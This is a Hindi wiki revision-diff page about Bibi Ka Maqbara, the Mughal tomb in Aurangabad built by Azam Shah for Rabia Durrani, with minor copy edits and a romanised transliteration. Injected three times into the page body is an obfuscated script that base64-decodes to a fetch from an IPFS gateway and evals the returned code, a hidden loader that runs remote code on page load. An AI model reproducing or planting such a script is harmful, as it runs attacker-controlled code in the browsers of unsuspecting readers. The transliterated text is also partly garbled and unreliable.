Difference between revisions of "बीबी का मक़बरा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:Bibi-Ka-Maqbara-Aurangabad.jpg|thumb|250px|बीबी का मक़बरा, [[औरंगाबाद महाराष्ट्र|औरंगाबाद]]<br /> Bibi Ka Maqbara, Aurangabad]]
 
[[चित्र:Bibi-Ka-Maqbara-Aurangabad.jpg|thumb|250px|बीबी का मक़बरा, [[औरंगाबाद महाराष्ट्र|औरंगाबाद]]<br /> Bibi Ka Maqbara, Aurangabad]]
 
*बीबी का मक़बरा [[महाराष्ट्र]] राज्य के [[औरंगाबाद महाराष्ट्र|औरंगाबाद]] में स्थित है।
 
*बीबी का मक़बरा [[महाराष्ट्र]] राज्य के [[औरंगाबाद महाराष्ट्र|औरंगाबाद]] में स्थित है।
*औरंगाबाद में दौलताबाद क़िले से कुछ ही दूरी पर हैं बीबी का मक़बरा है।<ref name="पुरवाई">{{cite web |url=http://purvaai.wordpress.com/2010/04/25/%E0%A4%AC%E0%A5%80%E0%A4%AC%E0%A5%80-%E0%A4%95%E0%A4%BE-%E0%A4%AE%E0%A4%95%E0%A4%AC%E0%A4%B0%E0%A4%BE/ |title=बीबी का मक़बरा |accessmonthday=[[27 जनवरी]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=पुरवाई |language=हिन्दी }}</ref>
+
*औरंगाबाद में दौलताबाद क़िले से कुछ ही दूरी पर बीबी का मक़बरा है।<ref name="पुरवाई">{{cite web |url=http://purvaai.wordpress.com/2010/04/25/%E0%A4%AC%E0%A5%80%E0%A4%AC%E0%A5%80-%E0%A4%95%E0%A4%BE-%E0%A4%AE%E0%A4%95%E0%A4%AC%E0%A4%B0%E0%A4%BE/ |title=बीबी का मक़बरा |accessmonthday=[[27 जनवरी]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=पुरवाई |language=हिन्दी }}</ref>
 
*बीबी का मक़बरा कालांतर में [[मुग़ल]] शहंशाह [[औरंगज़ेब]] ने फतेहनगर के समीप ही [[ताजमहल]] की तरह बनवाया था और नगर का नाम खाड़की से बदलकर औरंगाबाद कर दिया।
 
*बीबी का मक़बरा कालांतर में [[मुग़ल]] शहंशाह [[औरंगज़ेब]] ने फतेहनगर के समीप ही [[ताजमहल]] की तरह बनवाया था और नगर का नाम खाड़की से बदलकर औरंगाबाद कर दिया।
 
*बीबी के मक़बरा का निर्माण मुग़ल बादशाह औरंगज़ेब के शहजा़दे [[आज़मशाह]] ने अंतिम 17वीं शताब्दी में करवाया था।
 
*बीबी के मक़बरा का निर्माण मुग़ल बादशाह औरंगज़ेब के शहजा़दे [[आज़मशाह]] ने अंतिम 17वीं शताब्दी में करवाया था।
 
*बीबी का मक़बरा को औरंगजेब के बेटे आज़मशाह ने अपनी माता [[रबिया दुर्रानी]] की याद में बनवाया था।
 
*बीबी का मक़बरा को औरंगजेब के बेटे आज़मशाह ने अपनी माता [[रबिया दुर्रानी]] की याद में बनवाया था।
*बीबी का मक़बरा [[अकबर]] एवं [[शाहजहाँ]] के काल के शाही निर्माण से अंतिम मुग़लों के साधारण वास्तुकला के परिवर्तन को दर्शाता है। ताजमहल से तुलना के कारण ही यह अपेक्षा का कारण बना रहा।<ref>{{cite web |url=http://hi.worldpoi.info/poi/756/ |title=बीबी का मकबरा |accessmonthday=[[27 जनवरी]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=वर्ल्डपोई |language=हिन्दी }}</ref>
+
*बीबी का मक़बरा [[अकबर]] एवं [[शाहजहाँ]] के काल के शाही निर्माण से अंतिम मुग़लों के साधारण वास्तुकला के परिवर्तन को दर्शाता है।<ref>{{cite web |url=http://hi.worldpoi.info/poi/756/ |title=बीबी का मकबरा |accessmonthday=[[27 जनवरी]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=वर्ल्डपोई |language=हिन्दी }}</ref>
 
*बीबी का मक़बरा दक्षिण भारतीय ताज के रूप में जाना जाता है।  
 
*बीबी का मक़बरा दक्षिण भारतीय ताज के रूप में जाना जाता है।  
 
*प्रवेश द्वार से भीतर जाने के बाद आगे बिल्कुल ताजमहल जैसा लगता हैं। सामने एक छोटा ताल हैं जिसमे ताजमहल जैसी छवि झिलमिलाती हैं। आगे गलियारा जैसा हैं जिसके दोनों और हरीतिमा हैं।<ref name="पुरवाई" />
 
*प्रवेश द्वार से भीतर जाने के बाद आगे बिल्कुल ताजमहल जैसा लगता हैं। सामने एक छोटा ताल हैं जिसमे ताजमहल जैसी छवि झिलमिलाती हैं। आगे गलियारा जैसा हैं जिसके दोनों और हरीतिमा हैं।<ref name="पुरवाई" />
*मक़बरे में आगे जाकर एक बड़ा हॉल है जिसमे बीचोबीच रेलिंग लगी हुई है जिससे नीचे मक़बरा दिखाई देता है। हॉल की दीवारों और छत पर बहुत सुन्दर नक़्क़ाशी है। इस बड़े हॉल के चारों ओर खुला भाग और चारों ओर स्तम्भ बने हुए हैं।<ref name="पुरवाई" />
+
*मक़बरे में आगे जाकर एक बड़ा हॉल है जिसमें बीचोबीच रेलिंग लगी हुई है जिससे नीचे मक़बरा दिखाई देता है। हॉल की दीवारों और छत पर बहुत सुन्दर नक़्क़ाशी है। इस बड़े हॉल के चारों ओर खुला भाग और चारों ओर स्तम्भ बने हुए हैं।<ref name="पुरवाई" />
*मक़बरे के बाहर चारों ओर बड़े भूभाग में हरियाली हैं। बीबी का मक़बरा बहुत सुन्दर जगह हैं।<ref name="पुरवाई" />
+
*मक़बरे के बाहर चारों ओर बड़े भू-भाग में हरियाली हैं। बीबी का मक़बरा बहुत सुन्दर जगह हैं।<ref name="पुरवाई" />
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 11:12, 27 January 2011

[[chitr:Bibi-Ka-Maqbara-Aurangabad.jpg|thumb|250px|bibi ka maqabara, aurangabad
Bibi Ka Maqbara, Aurangabad]]

  • bibi ka maqabara maharashtr rajy ke aurangabad mean sthit hai.
  • aurangabad mean daulatabad qile se kuchh hi doori par bibi ka maqabara hai.[1]
  • bibi ka maqabara kalaantar mean mugal shahanshah aurangazeb ne phatehanagar ke samip hi tajamahal ki tarah banavaya tha aur nagar ka nam kha daki se badalakar aurangabad kar diya.
  • bibi ke maqabara ka nirman mugal badashah aurangazeb ke shahaja़de azamashah ne aantim 17vian shatabdi mean karavaya tha.
  • bibi ka maqabara ko aurangajeb ke bete azamashah ne apani mata rabiya durrani ki yad mean banavaya tha.
  • bibi ka maqabara akabar evan shahajahaan ke kal ke shahi nirman se aantim mugaloan ke sadharan vastukala ke parivartan ko darshata hai.[2]
  • bibi ka maqabara dakshin bharatiy taj ke roop mean jana jata hai.
  • pravesh dvar se bhitar jane ke bad age bilkul tajamahal jaisa lagata haian. samane ek chhota tal haian jisame tajamahal jaisi chhavi jhilamilati haian. age galiyara jaisa haian jisake donoan aur haritima haian.[1]
  • maqabare mean age jakar ek b da h aaul hai jisamean bichobich reliang lagi huee hai jisase niche maqabara dikhaee deta hai. h aaul ki divaroan aur chhat par bahut sundar naqqashi hai. is b de h aaul ke charoan or khula bhag aur charoan or stambh bane hue haian.[1]
  • maqabare ke bahar charoan or b de bhoo-bhag mean hariyali haian. bibi ka maqabara bahut sundar jagah haian.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 1.3 bibi ka maqabara (hindi) puravaee. abhigaman tithi: 27 janavari, 2011.
  2. bibi ka makabara (hindi) varldapoee. abhigaman tithi: 27 janavari, 2011.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>